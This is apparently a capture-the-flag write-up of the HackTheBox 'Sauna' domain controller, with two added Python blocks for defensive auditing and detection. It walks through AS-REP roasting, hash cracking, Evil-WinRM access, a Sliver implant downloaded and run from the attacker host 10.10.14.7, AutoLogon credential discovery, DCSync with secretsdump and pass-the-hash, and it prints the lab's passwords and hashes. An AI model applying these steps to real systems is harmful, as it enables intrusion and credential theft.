## Summary

---

## Unauthenticated External Access

### Remote Service Enumeration

```sh
nmap -sV -sC -T4 -vvv -oN remote-services-base.nmap $RHOST
nmap -p- -sV -vvv -oN remote-services-all-ports.nmap $RHOST
```

### SMB - 445

| Check          | Value                                    | Command                                  |
| -------------- | ---------------------------------------- | ---------------------------------------- |
| Null Sessions? | true                                     | `nxc smb $RHOST -u '' -p ''`             |
| SMBv1          | false                                    |                                          |
| signing        | true                                     |                                          |
| domain         | egotistical-bank.local                   |                                          |
| name           | sauna                                    |                                          |
| enum shares?   | false                                    | `nxc smb $RHOST -u '' -p '' --shares`    |
| [[RID Brute]]  | false                                    | `nxc smb $RHOST -u '' -p '' --rid-brute` |
| guest account? | false                                    | `nxc smb $RHOST -u '' -p ''`             |
| vulns?         |                                          |                                          |
| OS             | Windows 10 / Server 2019 Build 17763 x64 |                                          |

Don't appear to give us much love here...

Vulnerability enumeration:

```sh
nxc smb $RHOST -u '' -p '' -M spooler -M zerologon -M smbghost -M ms17-010 -M printnightmare
```

- suffers from the [[Zerologon Vulnerability]]

### LDAP

- anon bind? permitted
- users? can list

```sh
# yields no usable results
ldapsearch -x -H ldap://$RHOST -s base -b "DC=egotistical-bank,DC=local" "(objectclass=*)" > ldap-base.txt

# yields no usable results
ldapsearch -x -H ldap://$RHOST -b "DC=egotistical-bank,DC=local" "(objectClass=user)" > ldap-users.out

# reveals a single user
nxc ldap $RHOST --users
# CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
```

### WAPP - 80 HTTP

- appears custom
- appears to be 100% static
- is served by [[Microsoft IIS - TODO]]

#### Directory enumeration

```sh
gobuster dir --wordlist ~/arsenal/wordlists/raft-large-directories.txt --url http://$RHOST
```

reveals little of interest...

#### Team & Users

![[Pasted image 20250206183326.png]]

The page http://10.10.10.175/about.html reveals a list of employees in the company. Let's generate a user list formatted in a variety of ways and then use [[Kerbrute]] to "spray" the usernames.
Generated a variety of these usernames, which may be found in `$TNAME/creds/user_guesses.txt`. Running [[Kerbrute]]:

```sh
kerbrute userenum -d egotistical-bank.local --dc $RHOST ./user_guesses.txt
```

returned a hit on `fsmith`; wrote that to `$THOME/creds/users.txt`.

### [[AS-REP Roasting]] `fsmith`

```
GetNPUsers.py 'egotistical-bank.local/' -dc-ip $RHOST -usersfile users.txt -format hashcat
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

$krb5asrep$23$fsmith@EGOTISTICAL-BANK.LOCAL:33dbb3668cf1e2d2b1d91a76bb57982b$340de4aa3c5856dd6c9b396da27f5123694d0c162c6aa65d11025a184fa5b49d8fc5f507fc486ba4770922a75541ed22dbd380a2e0a6119cc200ff38e0b89f49c7a656cc3347a03965426abff45ec44832550fb9f93d6cdc87a806a869fd3f1622797e90b64dfd1c1c1bb8cf4cdb68d6efaf3c4f3d2e13aaab2e79558ded8ec40eacd51b34a3a532ebb45d1b6dc9c16b753aadfe707f45e1736a5cd3a4f14a3d09864ed46efa1036d3f2f573fb2e89b61ebd35a5924cf9ccc1f7d58a8546ee6d8cb5a3c8862467433d6eaeca43b00ea0f9e7af504c5c2d51425df2427de331d1f28fd445d982e9e68c1cb0527db2e66a16db823339a3fa2f85617c50b646c4f2
```

noice - [[AS-REP Roasting]] returns a hash which we may crack using [[Hashcat - Hash Cracking]]:

```sh
hashcat -m 18200 -a 0 fsmith-AS-REP.hash ~/arsenal/wordlists/rockyou.txt --force
# yields Thestrokes23
```

---

## Authenticated External Access - `fsmith`

Setting up a new folder for housekeeping:

```sh
[λ]- [fsmith]-> cat .envrc
source_up
export USER=fsmith
export PASS=Thestrokes23
```

Let the re-enumeration begin...

### SMB

#### Shares

![[Pasted image 20250206191424.png]]

Something of note: there's a printer here, which is unusual, and our previous enumeration revealed that the [[Print Spooler Service]] was enabled. Furthermore, the [[SYSVOL SMB Share]] is now accessible.

### [[WinRM - 5986 HTTP]]

A quick check reveals that we have access.
```sh
[λ]- [fsmith]-> nxc winrm $RHOST -u $USER -p $PASS
WINRM       10.10.10.175    5985   SAUNA   [*] Windows 10 / Server 2019 Build 17763 (name:SAUNA) (domain:EGOTISTICAL-BANK.LOCAL)
WINRM       10.10.10.175    5985   SAUNA   [+] EGOTISTICAL-BANK.LOCAL\fsmith:Thestrokes23 (Pwn3d!)
```

We connect using [[Evil-WinRM]]:

```sh
[λ]- [fsmith]-> evil-winrm -i $RHOST -u $USER -p $PASS
```

Aaaaaaaand we're in.

---

## Authenticated Internal Access - `fsmith`

I wanna start off by improving my foothold by adding a [[Sliver C2]] agent, as these come pre-packaged with all the tooling I need.

```sh
sliver > generate --os windows --http 10.10.14.7 --skip-symbols
[*] Implant saved to /home/noctua/targets/sauna/fsmith/THICK_ENERGY.exe
```

We download it to the target using:

```powershell
*Evil-WinRM* PS C:\Users\FSmith\Documents> curl http://10.10.14.7:8000/THICK_ENERGY.exe -o agent.exe
*Evil-WinRM* PS C:\Users\FSmith\Documents> .\agent.exe
```

We're now locked and loaded to proceed with further lateral movement and privesc.

### [[BloodHound]]

We'll go ahead and execute the following commands from within our [[Sliver C2]] session:

```sliver
sharp-hound-3
# produces 20250206182833_BloodHound.zip
download 20250206182833_BloodHound.zip
```

We now have the graph data on our local attacker machine and proceed by uploading it to the BloodHound browser GUI.

#### [[Kerberoasting]]

![[Pasted image 20250206201503.png]]

```sliver
rubeus -- kerberoast

[*] rubeus output:
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2

[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Target Domain          : EGOTISTICAL-BANK.LOCAL
[*] Searching path 'LDAP://SAUNA.EGOTISTICAL-BANK.LOCAL/DC=EGOTISTICAL-BANK,DC=LOCAL' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 1

[*] SamAccountName         : HSmith
[*] DistinguishedName      : CN=Hugo Smith,DC=EGOTISTICAL-BANK,DC=LOCAL
[*] ServicePrincipalName   : SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111
[*] PwdLastSet             : 1/22/2020 9:54:34 PM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[X] Error during request for SPN SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111@EGOTISTICAL-BANK.LOCAL : No credentials are available in the security package
```

Running `klist` inside the Evil-WinRM session yields `Cached Tickets: 0`, indicating that there's no [[Kerberos - AD - TODO]] ticket available in the current session.

#### [[DCSync Attack]]

- We discover that an [[AD - Service Account]] has [[DCSync Attack]] rights.

![[Pasted image 20250206200857.png]]

If we can get to `svc_loanmgr` we'll be gucci....

### [[Windows Privesc Methodology]]

- running [[Winpeas]] (how can we get colored output going in evil-winrm?)
- `AppCmd.exe` was found - only interesting with Administrative privileges.
- Found `AutoLogon credentials`:

```
Some AutoLogon credentials were found
DefaultDomainName             :  EGOTISTICALBANK
DefaultUserName               :  EGOTISTICALBANK\svc_loanmanager
DefaultPassword               :  Moneymakestheworldgoround!
```

## Lateral movement `fsmith->svc_loanmanager`

**Credentials:** `svc_loanmgr:Moneymakestheworldgoround!`

Previous BloodHound enumeration revealed that `svc_loanmanager` had `CanPSRemote`, meaning that we can fire up another [[Evil-WinRM]] shell.
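The AS-REP roasting and Kerberoasting findings above come down to two directory attributes. As an added defender-side example (not code from this writeup), the following Python audit applies the Rubeus LDAP filter quoted above plus the `DONT_REQ_PREAUTH` check to a constructed set of account records; the `websvc` account and all attribute values are assumptions.

```python
# Added example (not from the writeup): defender-side audit of the two account
# exposures used above. It encodes the Rubeus LDAP filter quoted in the
# Kerberoasting output (user objects with an SPN, not krbtgt, not disabled)
# plus the DONT_REQ_PREAUTH flag that GetNPUsers.py relies on.
SAM_NORMAL_USER_ACCOUNT = 805306368   # samAccountType value in the Rubeus filter
UAC_ACCOUNTDISABLE = 0x0002           # userAccountControl bit behind "...803:=2"
UAC_DONT_REQ_PREAUTH = 0x400000       # pre-auth not required -> AS-REP roastable
ETYPE_AES_BITS = 0x18                 # msDS-SupportedEncryptionTypes: AES128 | AES256

def audit_account(acct):
    """Return the list of roasting exposures for one directory record."""
    findings = []
    if acct.get("samAccountType") != SAM_NORMAL_USER_ACCOUNT:
        return findings                  # computers, groups etc. are out of scope
    uac = acct.get("userAccountControl", 0)
    if uac & UAC_ACCOUNTDISABLE:
        return findings                  # disabled accounts yield no usable ticket
    if uac & UAC_DONT_REQ_PREAUTH:
        findings.append("asrep-roastable")
    if acct.get("servicePrincipalName") and acct["sAMAccountName"].lower() != "krbtgt":
        findings.append("kerberoastable")
        # No AES bits (or attribute unset): the KDC issues RC4 service tickets,
        # which Rubeus reports as "Supported ETypes : RC4_HMAC_DEFAULT".
        if acct.get("msDS-SupportedEncryptionTypes", 0) & ETYPE_AES_BITS == 0:
            findings.append("rc4-only-spn")
    return findings

def audit_directory(accounts):
    """Map sAMAccountName -> findings, keeping only accounts with exposures."""
    report = {}
    for acct in accounts:
        findings = audit_account(acct)
        if findings:
            report[acct["sAMAccountName"]] = findings
    return report

# Constructed records modelled on this box; "websvc" is invented to show the
# AES-only case. Real input would be an LDAP export of the same attributes.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "FSmith", "samAccountType": 805306368,
     "userAccountControl": 0x410200},   # NORMAL | DONT_EXPIRE_PASSWD | DONT_REQ_PREAUTH
    {"sAMAccountName": "HSmith", "samAccountType": 805306368, "userAccountControl": 0x10200,
     "servicePrincipalName": ["SAUNA/HSmith.EGOTISTICALBANK.LOCAL:60111"]},
    {"sAMAccountName": "krbtgt", "samAccountType": 805306368, "userAccountControl": 0x202,
     "servicePrincipalName": ["kadmin/changepw"]},
    {"sAMAccountName": "websvc", "samAccountType": 805306368, "userAccountControl": 0x10200,
     "servicePrincipalName": ["HTTP/web.egotistical-bank.local"], "msDS-SupportedEncryptionTypes": 0x18},
    {"sAMAccountName": "SAUNA$", "samAccountType": 805306369, "userAccountControl": 0x82000,
     "servicePrincipalName": ["HOST/SAUNA"]},
]
```

Clearing `DONT_REQ_PREAUTH` and setting AES-only encryption types on SPN accounts removes both findings; the audit re-run against the fixed export should return an empty report.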
## Lateral movement `svc_loanmanager`->`Administrator`

As previously noted, `svc_loanmgr` has the `DCSync` #AD-priv, which enables us to perform a [[DCSync Attack]]:

```sh
[λ]- [svc_loanmanager]-> secretsdump.py 'egotistical-bank.local'/'svc_loanmgr':'Moneymakestheworldgoround!'@'10.10.10.175'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e:::
...
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:42ee4a7abee32410f470fed37ae9660535ac56eeb73928ec783b015d623fc657
Administrator:aes128-cts-hmac-sha1-96:a9f3769c592a8a231c3c972c4050be4e
Administrator:des-cbc-md5:fb8f321c64cea87f
...
```

We attempt a [[Pass The Hash Attack (PTH) - TODO]]:

```sh
evil-winrm -i $RHOST -u Administrator -H 823452073d75b9d1cf70ebdf86c7f98e
```

Aaaand we're in.

---

## Lessons Learned

- had to look up tips on getting usernames...
- need to get colored output for winpeas + evil-winrm
- pulled down winpeas.exe binaries to my attacker machine; they worked like a charm.
- missed the winpeas privesc vector somehow...
  - the output got lost in information noise; tweaked my [[Winpeas]] cheatsheet to include command flags that reduce and focus the output.
- needed a hint to get the `GetNPUsers` command syntax correct
- just got more drills in
- refined my reporting and note taking structure
- used this box as an occasion to reorganize some workflow and scripting stuffs

---

## Reference

- IppSec's video and writeup...
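The DCSync step above leaves a recognisable trace on the domain controller: a Security event 4662 whose Properties carry the DS-Replication-Get-Changes extended rights, requested by a non-DC account. As an added detection example (not from this writeup), this Python scanner applies that logic to constructed event records; the field names mirror the Windows event XML, and the machine-account and allowlist handling are assumptions.

```python
import re

# Added example (not from the writeup): flag DCSync-style replication requests
# in Windows Security event 4662 records. The extended-right GUIDs are the real
# DRSUAPI control-access rights; the events below are constructed.
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100   # AccessMask bit for "Control Access" (extended rights)
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}", re.I)

def dcsync_alert(event, allowlist=frozenset()):
    """Return an alert dict for a replication request, or None if benign."""
    if event.get("EventID") != 4662:
        return None
    if int(event.get("AccessMask", "0x0"), 16) & CONTROL_ACCESS == 0:
        return None
    subject = event.get("SubjectUserName", "")
    # DCs replicate constantly under their machine accounts ("SAUNA$"); the
    # allowlist is for legitimate sync identities such as Entra Connect.
    if subject.endswith("$") or subject.lower() in allowlist:
        return None
    rights = [REPL_RIGHTS[g.lower()] for g in GUID_RE.findall(event.get("Properties", ""))
              if g.lower() in REPL_RIGHTS]
    if not rights:
        return None
    return {"subject": f"{event.get('SubjectDomainName', '')}\\{subject}",
            "rights": rights, "object": event.get("ObjectName", "")}

def scan(events, allowlist=frozenset()):
    """Run dcsync_alert over a batch of parsed events and keep the hits."""
    return [a for a in (dcsync_alert(e, allowlist) for e in events) if a]

# Constructed 4662/4624 records modelled on the secretsdump step in this writeup
# (field names follow the Windows event XML; the domain object GUID is a placeholder).
REPL_PROPS = "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "svc_loanmgr", "SubjectDomainName": "EGOTISTICAL-BANK",
     "ObjectName": "%{<domain-object-guid>}", "AccessMask": "0x100", "Properties": REPL_PROPS},
    {"EventID": 4662, "SubjectUserName": "SAUNA$", "SubjectDomainName": "EGOTISTICAL-BANK",
     "ObjectName": "%{<domain-object-guid>}", "AccessMask": "0x100", "Properties": REPL_PROPS},
    {"EventID": 4662, "SubjectUserName": "fsmith", "SubjectDomainName": "EGOTISTICAL-BANK",
     "ObjectName": "CN=FSmith,CN=Users,DC=EGOTISTICAL-BANK,DC=LOCAL", "AccessMask": "0x10",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},   # ordinary attribute read
    {"EventID": 4624, "SubjectUserName": "fsmith", "SubjectDomainName": "EGOTISTICAL-BANK"},
]
```

Event 4662 is only emitted when the "Audit Directory Service Access" subcategory is enabled and the domain object carries a SACL for the replication rights, so the scanner finds nothing on a DC that was never configured to audit them.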